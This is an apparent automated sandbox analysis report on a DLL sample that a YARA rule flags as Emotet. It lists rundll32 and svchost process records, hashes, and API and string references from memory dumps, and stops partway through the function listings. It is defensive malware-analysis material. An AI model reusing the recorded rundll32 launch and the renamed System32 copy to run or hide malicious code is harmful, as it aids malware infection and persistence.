Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6416 Parent PID: 7020

General

Start time:	01:02:24
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 2528 Parent PID: 6668

General

Start time:	01:02:25
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5732 Parent PID: 772

General

Start time:	01:02:32
Start date:	19/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kcjcdjrdnmqurw\wsxegqzrq.heo",Control_RunDLL
Imagebase:	0xf70000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: svchost.exe PID: 4936 Parent PID: 560

General

Start time:	01:02:53
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2032 Parent PID: 560

General

Start time:	01:03:45
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 4004 Parent PID: 560

General

Start time:	01:04:20
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 7080 Parent PID: 560

General

Start time:	01:04:34
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 1312 Parent PID: 560

General

Start time:	01:04:53
Start date:	19/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6668 Parent PID: 5468 loaddll32.exeCOMMON

Executed Functions

Function 6F186620, Relevance: 80.7, APIs: 44, Strings: 1, Instructions: 1995COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6F186692
__aullrem.LIBCMT ref: 6F1866C6
GetTickCount64.KERNEL32 ref: 6F18676C
GetTickCount64.KERNEL32 ref: 6F186772
GetTickCount64.KERNEL32 ref: 6F1867A1
GetTickCount64.KERNEL32 ref: 6F1867A7
GetShellWindow.USER32 ref: 6F186927
GetOEMCP.KERNEL32 ref: 6F1869D2

Part of subcall function 6F185D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
Part of subcall function 6F185D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
Part of subcall function 6F185D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
Part of subcall function 6F185D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

CoFreeUnusedLibraries.OLE32 ref: 6F186A30

Part of subcall function 6F185A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
Part of subcall function 6F185A30: CloseClipboard.USER32 ref: 6F185A73
Part of subcall function 6F185A30: GetMenuCheckMarkDimensions.USER32 ref: 6F185B30

Strings

?, xrefs: 6F18691B

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: f8083b9250c1f3d6960bad3ca0f6e103964b6c0e580ea63c04044d86dbc3d28e
Instruction ID: 62b00dda1c1cf1a7ce9adcf4343f8ab844e4b9308ce32afe56a16c45b3ab14e0
Opcode Fuzzy Hash: f8083b9250c1f3d6960bad3ca0f6e103964b6c0e580ea63c04044d86dbc3d28e
Instruction Fuzzy Hash: 8313A931D10B5DCBCB12CF7AC99029DF7B1AF9A394F14839AE81977191EB3469A19F00

Uniqueness

Uniqueness Score: -1.00%

Function 00C9441E, Relevance: 15.3, Strings: 12, Instructions: 329COMMON

Download Yara Rule

Strings

}, xrefs: 00C94657
'N2, xrefs: 00C9444E
]jP, xrefs: 00C94AB2
E>&, xrefs: 00C9447B
.~P, xrefs: 00C946FF
3I, xrefs: 00C9487A
bK, xrefs: 00C945FD
Pe, xrefs: 00C94854
]jP, xrefs: 00C9491E
|BC, xrefs: 00C94813
UKR, xrefs: 00C94710
}L~, xrefs: 00C94757

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID:
String ID: .~P$3I$E>&$Pe$UKR$]jP$]jP$bK$|BC$}L~$'N2$}
API String ID: 0-887363794
Opcode ID: 4acea60b7063d067eaaf5d2aaddf9ddb7db368bced0ed1a0c9b7f9a214a57d55
Instruction ID: d633659166b148067442dba95aa42e1bf30a26e80867e616de0a2001f9592ca5
Opcode Fuzzy Hash: 4acea60b7063d067eaaf5d2aaddf9ddb7db368bced0ed1a0c9b7f9a214a57d55
Instruction Fuzzy Hash: D8F122715083809FD768DF25C88AA5BBBF1FBC4398F108A1DF1DA96260D7B08949DF46

Uniqueness

Uniqueness Score: -1.00%

Function 00CACAA8, Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

JrU, xrefs: 00CACB1C
:N, xrefs: 00CACC18
i\[, xrefs: 00CACC0A

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: CreateProcess
String ID: :N$JrU$i\[
API String ID: 963392458-199651125
Opcode ID: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction ID: 5403724b343fc97980d4acb0d071d7101e98df9ac0abeff8d59e4b55e9fbb20e
Opcode Fuzzy Hash: 376ca744e12d20fdec77dc4e9c009c91e62e708f38869c5c5c4e5919ba3bceee
Instruction Fuzzy Hash: 87613272D0021AEBDF08CFE1D94A9EEFBB6FB48308F208049E511B6260D7B55A15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F185730, Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

s, xrefs: 6F1857A0
$, xrefs: 6F18577C

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: $$s
API String ID: 0-4175558158
Opcode ID: 5c5f6e235fe1dcd927ee535485ab3e4d705526e38c94c55351bd059126cc845e
Instruction ID: ac6b1158136f835ff5ab0d56b4248c9830978aa00ef97eb064fd112c8011eac5
Opcode Fuzzy Hash: 5c5f6e235fe1dcd927ee535485ab3e4d705526e38c94c55351bd059126cc845e
Instruction Fuzzy Hash: A6914930A052668BCB0CCF6DD9512E9FFB1FF69314F0082ADD855D7256DB34AA69CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00CA43B3, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e28d2e61dc1ffd4f646efea674cafec3e93c5eddeb2845185ba4cc254d906644
Instruction ID: c82bb0af85a7c86bba3f3291d91c22c5c3b7295faf9d8328ff114127879d7dae
Opcode Fuzzy Hash: e28d2e61dc1ffd4f646efea674cafec3e93c5eddeb2845185ba4cc254d906644
Instruction Fuzzy Hash: 64211271D0120EEBCB48DFA8D9865AEBBF0FB40314F208199D815B6250E7B45B059F81

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

_free.LIBCMT ref: 6F1ABABE
_free.LIBCMT ref: 6F1ABAD5
_free.LIBCMT ref: 6F1ABAF4
_free.LIBCMT ref: 6F1ABB0F
_free.LIBCMT ref: 6F1ABB26

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: beab6693382b5f8c251117fb0b4c72ba4275715fe12027da7a3476dfa29d88ae
Instruction ID: 1a1cc283a5bc1efda38ddbd1fcbc53d8e4f7e702ed22657d498af2243049594c
Opcode Fuzzy Hash: beab6693382b5f8c251117fb0b4c72ba4275715fe12027da7a3476dfa29d88ae
Instruction Fuzzy Hash: 5751C475A00708AFE714DF69CC40AAA77F4FF557A4F404669E809DB290E733E921CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6F184AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F184B16
std::_Lockit::_Lockit.LIBCPMT ref: 6F184B36
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184B56
std::_Facet_Register.LIBCPMT ref: 6F184BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6F184C13

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: fee0f13cf6ac21260313ed190937659738d845e801b605d00dc9823bf30c96f2
Instruction ID: 9dd5b52ea80cd4109be03e5302c88bc5dbd9ae598274c74ca9fe03828df8f0b6
Opcode Fuzzy Hash: fee0f13cf6ac21260313ed190937659738d845e801b605d00dc9823bf30c96f2
Instruction Fuzzy Hash: 5641B9719042148FDB15CF98C680B9EB7B8FF517A4F10416AD826AB281DB34BA21CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1817B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6F1817DD
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6F18182C

Part of subcall function 6F1960DA: _Yarn.LIBCPMT ref: 6F1960F9
Part of subcall function 6F1960DA: _Yarn.LIBCPMT ref: 6F19611D

__CxxThrowException@8.LIBVCRUNTIME ref: 6F18185E

Strings

bad locale name, xrefs: 6F181848

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 9d24e7ae8c7877433bce1b1b84685e4bfa200b26273c3cfd6f43e1ed0be840b0
Instruction ID: 82cdbb4cfb35b7b8362a1bffabd1cc009c95c07c9995f05009c24960642ac965
Opcode Fuzzy Hash: 9d24e7ae8c7877433bce1b1b84685e4bfa200b26273c3cfd6f43e1ed0be840b0
Instruction Fuzzy Hash: E811BE71804B449FD720CF68C944B4BBBF8FB29654F008A1EE469D3A81D779A118CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A770F, Relevance: 4.6, APIs: 3, Instructions: 149COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

_free.LIBCMT ref: 6F1A77B5

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_abort_free
String ID:
API String ID: 2251421968-0
Opcode ID: 19641c44b8cd05458b0d5e13783d353c25f1b914a9b2869fb6ad84f908fbf533
Instruction ID: 4e5292217c226330159038c4ddb83c3af961dc898002235b380feffa5bf42aad
Opcode Fuzzy Hash: 19641c44b8cd05458b0d5e13783d353c25f1b914a9b2869fb6ad84f908fbf533
Instruction Fuzzy Hash: F741AF35604205AFD715CFADC880EA9BBF8EF59394B6005AEE815C7295D732F920DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A7879, Relevance: 4.6, APIs: 3, Instructions: 92COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6F1A78A5
__cftoe.LIBCMT ref: 6F1A78D7

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 84766d18348a57a554f4f44fa6c4293a55c9bd60f2fd885a72c62f0ca81f76d2
Instruction ID: e11857d5295ee2ab5441714a9adf52f93e63ef55d8db8d320067eb334698cbe9
Opcode Fuzzy Hash: 84766d18348a57a554f4f44fa6c4293a55c9bd60f2fd885a72c62f0ca81f76d2
Instruction Fuzzy Hash: 4421A47A40420C7ADB2646569C15EEE3FACCB816B0F204157F928961C4EF33EB7086A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB31D2, Relevance: 1.6, APIs: 1, Instructions: 77processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 00CB32BB

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: b1d89f58b224d97c194b5334364d3a883de1ed001522d859009dba1237c90f0c
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 29311672801248BBCF65DF96CD09CDFBFB5FB89704F108188F91462220D3B58A64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C94248, Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000), ref: 00C942F1

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: a108b408eb850e1285193f2fc97e55009e260e959e1aa45b5dbfa130305f7831
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 661116B5E00208EBDB44DFE5D94AA9EBBB1FB44308F208089E515A7240D7B45B189FA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ACCCD, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6F1AA438,00000001,00000364,00000008,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1ACD0E

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 54f9580658cbfd16b32d0f03430f7a4a577839c756bc6afcda0a9324e72a4a32
Instruction ID: 270e9247b61d719e49a696b62f00844d7f2141ce612d39d49697327a9ba692ce
Opcode Fuzzy Hash: 54f9580658cbfd16b32d0f03430f7a4a577839c756bc6afcda0a9324e72a4a32
Instruction Fuzzy Hash: BBF0B439704729A6EB114F2A8904A8A3B59AF937F4B114516EC29AA184CB72F43146E4

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AB2C4, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6F1ACCCD: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,6F1AA438,00000001,00000364,00000008,000000FF,?,6F1A731A,000000FF,000000FF), ref: 6F1ACD0E

_free.LIBCMT ref: 6F1AB2E4

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 8909b6f9747e6b7866f4d940936f3669354bc6d9adb72e66ec975eea9a636a9c
Instruction ID: 51611acb9957d5469df8308f7a4d6f8f208a1808b03e67bc203ccdb4697026dc
Opcode Fuzzy Hash: 8909b6f9747e6b7866f4d940936f3669354bc6d9adb72e66ec975eea9a636a9c
Instruction Fuzzy Hash: A6F03CB6A00709AFC710DF68D441B9AB7F4EB48710F104166E918DB380E772A9208BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A9BD2, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 406380e2a814f0542eb71b336151226076d033bfbd6f477e2a1f018cbd9929c2
Instruction ID: beae318510f85985e5de1edc146ba9cacf55b502ec608d3f401158baef6c8820
Opcode Fuzzy Hash: 406380e2a814f0542eb71b336151226076d033bfbd6f477e2a1f018cbd9929c2
Instruction Fuzzy Hash: 80E02B39180B28AAFB1157798D60B8A36A89F133F0F910121DC18965CCCF73F4F086E8

Uniqueness

Uniqueness Score: -1.00%

Function 00CA17CB, Relevance: 1.3, APIs: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 00CA188D

Memory Dump Source

Source File: 00000001.00000002.463265872.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: c5b23e90b0ec109e7cddb215e48ca39d1fb02ef5ca4d93d6f05ee07e059772e1
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 422113B5D0020CFBDB08DFA4C94A9EEBBB4EB44304F208189E425A7250E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F18F700, Relevance: 38.9, APIs: 19, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(6F18ED98,B5D78B91,00000000,00000000), ref: 6F18F79A
_wcsstr.LIBVCRUNTIME ref: 6F18F806
CharNextW.USER32(?,00000000), ref: 6F18F819
CharNextW.USER32(00000000,?,00000000), ref: 6F18F81E
CharNextW.USER32(00000000,?,00000000), ref: 6F18F823
CharNextW.USER32(00000000,?,00000000), ref: 6F18F828
CharNextW.USER32(?,?,B5D78B91,00000000,00000000), ref: 6F18F85F
CharNextW.USER32(?,?,B5D78B91,00000000,00000000), ref: 6F18F86F
CharNextW.USER32(00000000,?,B5D78B91,00000000,00000000), ref: 6F18F8CE
CoTaskMemFree.OLE32(00000000,B5D78B91,00000000,00000000), ref: 6F18F8F3
lstrcmpiW.KERNEL32(?,?,?,B5D78B91,00000000,00000000), ref: 6F18F94E
CoTaskMemFree.OLE32(00000000,?,B5D78B91,00000000,00000000), ref: 6F18F966
CharNextW.USER32(?,?,B5D78B91,00000000,00000000), ref: 6F18F9B3
CharNextW.USER32(?,B5D78B91,00000000,00000000), ref: 6F18F9C3
CoTaskMemFree.OLE32(00000000,?,B5D78B91,00000000,00000000), ref: 6F18F9E5
CoTaskMemFree.OLE32(00000000,B5D78B91,00000000,00000000), ref: 6F18FA03
lstrcmpiW.KERNEL32(?,6F1C8D3C,?,?,C000008C,00000000,00000000), ref: 6F18FABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6F18FADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 6F18FBA1

Strings

HKCR, xrefs: 6F18F800
}}, xrefs: 6F18F8B0
HKCU{Software{Classes, xrefs: 6F18F82A

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc_wcsstr
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2771584749-1142484189
Opcode ID: c1caa695d77ff9d4b8f04f39f68d5842ba6c246c6ad7779480e87e99d9911fb0
Instruction ID: 781731208383d370b7d6a1210654cc5400b71c04ddfa745141c2ea267e7e9399
Opcode Fuzzy Hash: c1caa695d77ff9d4b8f04f39f68d5842ba6c246c6ad7779480e87e99d9911fb0
Instruction Fuzzy Hash: 70E1C135900359DFEB109FA8CA9479EB7B4EF16394F10416AE935EB284EB30A964CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F191CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,B5D78B91,?,?,?,?,6F1B9DAB,000000FF), ref: 6F191D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,6F1B9DAB,000000FF), ref: 6F191DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 6F191F40
GetClientRect.USER32 ref: 6F19224B
GetDeviceCaps.GDI32(?,0000005A), ref: 6F1922C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 6F1922D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 6F1922FA
SetTextColor.GDI32(?,?), ref: 6F192312
SelectObject.GDI32(?,00000000), ref: 6F19231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 6F192356
SelectObject.GDI32(?,00000000), ref: 6F192363
DeleteObject.GDI32(00000000), ref: 6F19236A

Strings

%s%d.%d%s, xrefs: 6F192198
%s%s%s, xrefs: 6F1921F2
[N/A], xrefs: 6F192117

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
